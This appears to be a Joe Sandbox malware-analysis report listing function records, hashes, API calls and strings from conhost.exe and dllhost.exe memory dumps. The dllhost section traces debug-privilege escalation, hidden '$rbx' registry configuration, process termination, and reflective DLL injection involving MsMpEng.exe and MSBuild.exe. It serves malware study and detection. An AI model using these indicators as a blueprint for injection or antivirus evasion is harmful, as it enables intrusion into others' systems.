Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 141ae7aa78bfd420d1d285258ce01ae9c4e971c699ba2c01c0f5847ca8e4e20c
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: CA114F31318B8391EB10DB26FD063FA63A6B744780F944635FA9983699FF68C905C700

Function 000001FD186E1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001FD186E2027
WriteFile.KERNEL32 ref: 000001FD186E2304
WriteFile.KERNEL32 ref: 000001FD186E234A
GetLastError.KERNEL32 ref: 000001FD186E2409

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 6085f66fa63b377519f5468ed2b769289ff0597182212274bdd233c3b20b3e12
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 80D1CB32B18B8589E711CFA9E4412FC37B3F354B98F444226EE5EA7B99DA34C55AC340

Function 000001FD186D14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FD186D14C6
HeapFree.KERNEL32 ref: 000001FD186D14D5
GetProcessHeap.KERNEL32 ref: 000001FD186D14E2
HeapFree.KERNEL32 ref: 000001FD186D14F1
GetProcessHeap.KERNEL32 ref: 000001FD186D1501

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 2a70a3e7bf5ea086a3ac225e7f2dcf3bb41dbe0460bf40e4871848235bb69038
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 9E01D732654B91DAE714DF66A8091A9B7A2F788F80B094039EB8953728EE34D451C740

Function 000001FD186E28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001FD186E28DF), ref: 000001FD186E2A12

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: d54c42a256fd6f24e9bec34f007e6bd85acbb17e5a0f2cf97402507ef6b0c2a9
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 8891D0326587528DFB64CF66A8527FD3BA3F354B88F44512AEE4A57B85DB34C486C300

Function 000001FD186D8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001FD186D80BC
GetCurrentThreadId.KERNEL32 ref: 000001FD186D80CA
GetCurrentProcessId.KERNEL32 ref: 000001FD186D80D6
QueryPerformanceCounter.KERNEL32 ref: 000001FD186D80E6

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 9e0d45b8f41a04612e167494d15ba1ecdde1cd64f4c94a55f9340444dd7e9ae6
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 9C11273A754F068AEB00CF60F85A3F833A4F719758F441E35EA6D867A4EB78C1588340

Function 000001FD186D27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001FD186D28CC
StrCpyW.SHLWAPI ref: 000001FD186D28E5

Part of subcall function 000001FD186D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001FD186D272F), ref: 000001FD186D3FA0

Strings

\\.\pipe\, xrefs: 000001FD186D28D7

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 0a4a2adaa71c8e2d6585264a3a96b2f0a0f5ebfb029d78899f901095b0af2348
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 9771C336208B8342E774DF26B9963FA6796F385BD4F440236EE8947B89DE35D604C740

Function 000001FD177680A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FD177680CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FD17768162

Strings

csm, xrefs: 000001FD17768149

Memory Dump Source

Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: bbacedfe8490290803dd36392004b56830fc8fe2e78bde83acae73a96b4d9274
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 0151A0B2359A028AFB58CB15F444BB973A3F344B98F168535EE4A477ACDB78C849C700

Function 000001FD17769AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001FD17769BA7

Strings

MOC, xrefs: 000001FD17769B6F
RCC, xrefs: 000001FD17769B77

Memory Dump Source

Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 98b539b98fb98127569a432fab64e2647f19adbf550e910acacf539860b74528
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 38617B72508BC581EB719B25F4407FAB7A1F785B88F054229EF9807BA9CB78C198CF00

Function 000001FD186D25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001FD186D26C2
StrCpyW.SHLWAPI ref: 000001FD186D26D9

Strings

\\.\pipe\, xrefs: 000001FD186D26CD

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: c090b82575a26dd4d3aed05f3a143ed8473bf9e76afdf1083b6a069f0351465a
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 6A51E23620C78381EB74DE2AB4563FA6793F394BA0F440235EED947B89DA3AD544C740

Function 000001FD186E2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001FD186E2778
GetLastError.KERNEL32 ref: 000001FD186E279D

Strings

U, xrefs: 000001FD186E2722

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: b0e14fd3dbe5a3a8e00d4859a859ab85cb16952d9393c1c0ccfd1ca0371ecda6
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: F841B172629B818AEB20DF65F8457FAB7A6F388784F904131FA4D87758EB38C441CB40

Function 000001FD186D9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001FD186D91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001FD186D87F7), ref: 000001FD186D9209

Strings

csm, xrefs: 000001FD186D91F6

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: a5397820f45ded7ed03cd20240f9d9682d920903e7ad00699c83dcbbd083d7b4
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: D2110D32218B8182EB61CF15F8452A9B7E6F788B94F585225EECD47B65EF3CC551CB00

Function 000001FD186D1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FD186D1D69
HeapAlloc.KERNEL32 ref: 000001FD186D1D77
GetProcessHeap.KERNEL32 ref: 000001FD186D1D9C
HeapFree.KERNEL32 ref: 000001FD186D1DAA

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 79fa1af248de6b9c957953eac523c515370886705379ad54e3834685150e1c39
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: BC116D31A05F8185EB14CB66B8092B9B7B2F788FD0F584138EE8E53765EF78D4428300

Function 000001FD186D1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FD186D126A
HeapAlloc.KERNEL32 ref: 000001FD186D1279
GetProcessHeap.KERNEL32 ref: 000001FD186D1293
HeapAlloc.KERNEL32 ref: 000001FD186D12A4

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 4968d5de2bd157deb1f5297e8417d5062b13a7cfa6bf20d16db6a38339238360
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 15E06D326417059AE714CF62E80D3E936E2FB88F05F44C028C90907350EF7D84998741

Function 000001FD186D1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FD186D1006
HeapAlloc.KERNEL32 ref: 000001FD186D1015
GetProcessHeap.KERNEL32 ref: 000001FD186D1028
HeapAlloc.KERNEL32 ref: 000001FD186D1037

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: e64253d61083728fc9ecf54d165262702ff6fa08e30c4bd456e7157e58a887e3
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 55E0E572651A05AAE728DB62E8092E976A2FB88B15F888034C90907320FE3884999A11

Analysis Process: dllhost.exePID: 1244, Parent PID: 552COMMON

Executed Functions

Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
GetLastError.KERNEL32 ref: 0000000140002E2A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EFF
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F2E
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F5E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F70
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F76

Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
Part of subcall function 000000014000200C: HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032
Part of subcall function 000000014000200C: OpenProcess.KERNEL32 ref: 0000000140002079
Part of subcall function 000000014000200C: TerminateProcess.KERNEL32 ref: 000000014000208C
Part of subcall function 000000014000200C: CloseHandle.KERNEL32 ref: 0000000140002095
Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32 ref: 00000001400020A5

RegCreateKeyExW.KERNELBASE ref: 0000000140002FB2
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140002FD9
RegSetKeySecurity.KERNELBASE ref: 0000000140002FF2
LocalFree.KERNEL32 ref: 0000000140002FFC
RegCreateKeyExW.KERNELBASE ref: 0000000140003032
GetCurrentProcessId.KERNEL32 ref: 000000014000303C
RegSetValueExW.KERNELBASE ref: 0000000140003063
RegCloseKey.KERNELBASE ref: 000000014000306D
RegCloseKey.ADVAPI32 ref: 0000000140003077
CreateThread.KERNELBASE ref: 0000000140003098
GetProcessHeap.KERNEL32 ref: 000000014000309E
HeapAlloc.KERNEL32 ref: 00000001400030AD
CreateThread.KERNELBASE ref: 00000001400030DB
CreateThread.KERNELBASE ref: 00000001400030FC
ShellExecuteW.SHELL32 ref: 0000000140003136
GetProcessHeap.KERNEL32 ref: 0000000140003196
HeapFree.KERNEL32 ref: 00000001400031A4
SleepEx.KERNELBASE ref: 00000001400031AD

Strings

kernel32.dll, xrefs: 0000000140002D99
SOFTWARE\$rbx-config, xrefs: 0000000140002F91
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 0000000140002FD2
SOFTWARE, xrefs: 0000000140002E52
$rbx-dll64, xrefs: 0000000140002EAA, 0000000140002F43
?, xrefs: 0000000140003026
svc64, xrefs: 0000000140003046
SeDebugPrivilege, xrefs: 0000000140002DDF
open, xrefs: 0000000140003117
ntdll.dll, xrefs: 0000000140002D8D
$rbx-dll32, xrefs: 0000000140002E7A, 0000000140002F09
Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d, xrefs: 0000000140002D5E
pid, xrefs: 000000014000300F

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
API String ID: 2725631067-1382791509
Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 000000014000189E
IsWow64Process.KERNEL32 ref: 00000001400018BA
CloseHandle.KERNELBASE ref: 00000001400018DE
OpenProcess.KERNEL32 ref: 0000000140001939
OpenProcess.KERNEL32 ref: 0000000140001958
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
PathFindFileNameW.SHLWAPI ref: 0000000140001987
lstrlenW.KERNEL32 ref: 0000000140001993
StrCpyW.SHLWAPI ref: 00000001400019AA
CloseHandle.KERNEL32 ref: 00000001400019B6
StrCmpIW.SHLWAPI ref: 00000001400019EA
NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
OpenProcessToken.ADVAPI32 ref: 0000000140001A43
GetTokenInformation.KERNELBASE ref: 0000000140001A6F
GetLastError.KERNEL32 ref: 0000000140001A79
LocalAlloc.KERNEL32 ref: 0000000140001A8C
GetTokenInformation.KERNELBASE ref: 0000000140001AB8
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
LocalFree.KERNEL32 ref: 0000000140001AEC
CloseHandle.KERNEL32 ref: 0000000140001B00
StrStrA.SHLWAPI ref: 0000000140001BAB
VirtualAllocEx.KERNEL32 ref: 0000000140001C15
WriteProcessMemory.KERNELBASE ref: 0000000140001C38
WaitForSingleObject.KERNEL32 ref: 0000000140001C79
GetExitCodeThread.KERNEL32 ref: 0000000140001C8F
VirtualFreeEx.KERNELBASE ref: 0000000140001CB1
CloseHandle.KERNELBASE ref: 0000000140001CC2
CloseHandle.KERNEL32 ref: 0000000140001CCB

Strings

MsMpEng.exe, xrefs: 00000001400019C1
ReflectiveDllMain, xrefs: 0000000140001BA1
MSBuild.exe, xrefs: 00000001400019D4
@, xrefs: 0000000140001C08

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

